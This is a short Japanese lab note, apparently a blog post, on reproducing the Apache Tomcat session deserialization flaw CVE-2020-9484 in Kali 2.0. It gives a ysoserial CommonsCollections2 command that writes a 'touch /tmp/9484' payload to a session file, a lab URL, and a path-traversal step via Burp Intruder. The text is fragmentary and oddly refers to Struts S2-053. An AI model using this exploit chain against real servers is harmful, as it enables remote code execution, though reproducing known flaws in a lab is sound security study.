
Kali 2.0 で Apache Tomcat Session の逆シリアル化コード実行脆弱性を再現
Kali 2.0 を使用して Apache Tomcat Session の逆シリアル化コード実行脆弱性 CVE-2020-9484 を再現
/yourtomcatdir/bin/startup.sh
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session
まず S2-053 にアクセスして正常に起動しているか確認します:
http://192.168.152.128:8080/s2-053/
再度アクセスしてパケットをキャプチャし、intruder を使用してパストラバーサルを行います


コマンドの実行に成功:
